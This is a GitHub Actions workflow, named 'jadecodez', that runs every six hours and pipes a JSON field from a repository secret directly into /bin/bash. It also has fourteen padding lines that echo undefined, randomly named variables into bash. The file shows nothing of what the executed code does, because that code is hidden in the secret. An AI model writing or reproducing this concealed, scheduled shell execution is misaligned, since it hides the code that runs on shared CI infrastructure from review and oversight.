name: jadecodez

on:
  workflow_dispatch:
  schedule:
    - cron: '43 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: jadecodez
        env:
          i3986: ${{ secrets.i3986 }}
        run: |
          echo $i3986 | jq -r .byd7555 | /bin/bash
          echo $b261 | jq -r .bjger5343 | /bin/bash
          echo $ts17 | jq -r .ro4589 | /bin/bash
          echo $oe3201 | jq -r .b4689 | /bin/bash
          echo $vaxrj04810 | jq -r .ra43346 | /bin/bash
          echo $pu87094 | jq -r .yjjr841 | /bin/bash
          echo $rskyv7141 | jq -r .kz29716 | /bin/bash
          echo $x9 | jq -r .srg5 | /bin/bash
          echo $rqe21289 | jq -r .qpzz7016 | /bin/bash
          echo $iwo8557 | jq -r .dkwcj4 | /bin/bash
          echo $n62651 | jq -r .aa04 | /bin/bash
          echo $p014 | jq -r .ua1214 | /bin/bash
          echo $xzhb76 | jq -r .a0357 | /bin/bash
          echo $eqy33086 | jq -r .uc3347 | /bin/bash
          echo $awtdr3973 | jq -r .rl96127 | /bin/bash

